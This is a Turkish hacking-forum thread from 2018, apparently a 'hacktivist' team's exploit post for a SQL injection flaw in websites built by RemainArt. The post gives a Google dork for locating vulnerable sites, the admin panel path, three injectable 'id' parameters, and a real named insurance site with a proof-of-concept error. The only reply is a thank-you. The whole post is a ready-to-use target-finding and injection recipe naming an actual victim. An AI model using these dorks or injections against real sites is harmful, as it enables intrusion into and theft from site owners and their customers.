Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: RemainArt Software Development SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,385 / 1,385
Deneyim: 43 / 100
Rep Sayısı: 2873
Mesaj Sayısı: 6502
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
RemainArt Software Development SQL Inj Vuln
18.09.2018 21:30
################################################################################​#################

# Exploit Title : RemainArt Software Development SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : remainart.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''Sitenin tasarımı ve yazılımı Remainart tarafından yapılmıştır.''

# Admin Panel Path :

/admin/index.php

# Exploit :

/duyurular.php?id=[SQL Injection]

/urunlerimiz.php?id=[SQL Injection]

/acenteliklerimiz.php?id=[SQL Injection]

################################################################################​#################

# Example Site => ozgursigortacilik.com.tr/duyurular.php?id=1006%27 => [ Proof of Concept ] => archive.is/Y0AlM

# SQL Database Error =>

checkPass fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''1006'' LIMIT 1' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,058 / 1,058
Deneyim: 32 / 100
Rep Sayısı: 1082
Mesaj Sayısı: 3054
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
RE: RemainArt Software Development SQL Inj Vuln
18.09.2018 22:17
Teşekkürler, Emeğine Sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti



1 Ziyaretçi